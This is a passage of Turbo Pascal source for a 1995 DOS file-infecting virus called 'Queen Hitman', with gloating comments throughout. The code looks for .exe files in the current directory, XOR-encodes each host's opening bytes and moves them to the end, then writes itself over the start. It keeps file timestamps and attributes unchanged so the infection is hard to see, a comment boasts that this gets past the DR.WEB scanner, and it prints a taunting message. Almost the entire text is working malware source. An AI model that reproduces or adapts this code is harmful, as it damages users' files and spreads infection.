For y:=1 To long Do {Well,Decode all the bytes in exeBuf array}
exeBuf[y]:=Chr(Ord(exeBuf[y]) Xor $7e);
end;
procedure code;
begin
For y:=1 To long Do
exeBuf[y]:=Chr(Ord(exeBuf[y]) Xor $7e); {We are using here the 7Eh
code,to XOR all the array}
end;
procedure timecomp; {Just to show ourself}
label 1,2;
begin
writeln('(c) 1995 Queen Hitman Virus inc.!');
writeln('Ha-ha-ha,You have a virus!');
end;
procedure execute; {This is a procedure,that will execute the file,
we are in now(starting from)}
begin
findfirst(paramstr(i),anyfile,sss); {Espessially for MR.LOZINSKY!!! :- }
if sss.size long then { DON't execute the source! :-( }
begin
assign(fff,sss.name); {Get the file_name in the handle}
attr2:=sss.attr; {Save attributes...}
time2:=sss.time; {... and time of the file}
reset(fff,1); {Open it!}
seek(fff,0); {Head in 0 point}
blockread(fff,mybuf,long); {Read from it the begining}
seek(fff,sss.size-long); {Put the header in the position:File_Size-Virus_size}
blockread(fff,exebuf,long); {And read the source EXE_Header and the file begining}
seek(fff,0); {Put the Head in 0}
decode; {Decode it!!! For MR.MOSTOVOY :-}
blockwrite(fff,exebuf,long); {Save the begining}
seek(fff,sss.size-long); {Head in File_Size-Virus_size}
truncate(fff); {Delete the end of the file,so if you've infected somthin like DR.WEB it woun't shout! ;-) }
close(fff); {And close it!}
setfattr(fff,archive); {Well,you know...LMD!!!}
setftime(fff,time2);
IF ParamCount < 0 Then {NO!!! This thing Executes the file}
Begin
For I:=1 To ParamCount Do
CmdLine:=CmdLine + ' ' + ParamStr(I);
End;
swapvectors;
exec(sss.name,cmdline);
swapvectors;
reset(fff,1); {Do it in the back sequence!...}
code;
seek(fff,0);
blockwrite(fff,mybuf,long);
seek(fff,sss.size-long);
blockwrite(fff,exebuf,long);
close(fff);
setftime(fff,time2);
setfattr(fff,attr2);
end;
end;
(*
Procedure,that will INFECT the *.EXE files,in the current directory
YEAHHH...
*)
procedure infect;
label next; {Just a label}
begin
findfirst('*.exe',anyfile,ss); {Find the Victim}
while doserror=0 do {While any available}
begin
if ss.size < long+1 then goto next; {Don't infect smaller then we are!}
assign(ff,ss.name); {You already know!}
attr1:=ss.attr; {And this too...}
time1:=ss.time;
setfattr(ff,archive);
reset(ff,1);
seek(ff,mark); {Put the head in the location of "Queen" in Viri(Check if this file is already infected!)}
blockread(ff,bufm1,5); {Read the mark}
if bufm1=id then goto next; {If TRUE,Then already infected :-((( }
seek(ff,0); {NO!!! :-))) }
blockread(ff,exebuf,long); {Copy the file_begining}
code; {And code it! :-D }
seek(ff,ss.size); {Head=File_End}
blockwrite(ff,exebuf,long); {Write the file_begining}
seek(ff,0); {Head=0}
blockwrite(ff,mybuf,long); {Write Virus!!! :- }
close(ff); {And close the file}
setftime(ff,time1); {...You know...}
setfattr(ff,attr1);
next: findnext(ss); {Seek the next victim! ;-))) }
end;
end;
(*
This is where the virus starts to think about it's children ;-)
HeHehe...
*)
procedure virusbody;
label next; {Label}
begin
findfirst(paramstr(i),anyfile,s); {Executed file}
while doserror=0 do {If available?!?}
begin
assign(f,s.name); {Cach the file_name in header}
attr:=s.attr; {..You..}
time:=s.time; {..Know..}
setfattr(f,archive); {..All..}
reset(f,1); {..This..}
seek(f,mark); {Check,if it is a virus(However,here can be a ERROR under DosShell&Win'95) :-((( }
blockread(f,bufm1,5);
if bufm1=id then {Yes!!! :-)))) }
begin
seek(f,0); {Copy the Virus_Body(It's source)}
blockread(f,mybuf,long);
end;
close(f);
setfattr(f,attr);
setftime(f,time); {And BAY!!!}
next: findnext(s);
end;
end;
(*
Here's the reall beginig...
*)
begin
checkbreak:=false; {LMS,Don't press ^C,It has to be finished!!! :-))) }
virusbody; {G }
infect; { O }
execute; {..O}
timecomp; {N.}
end. {BAY!!!}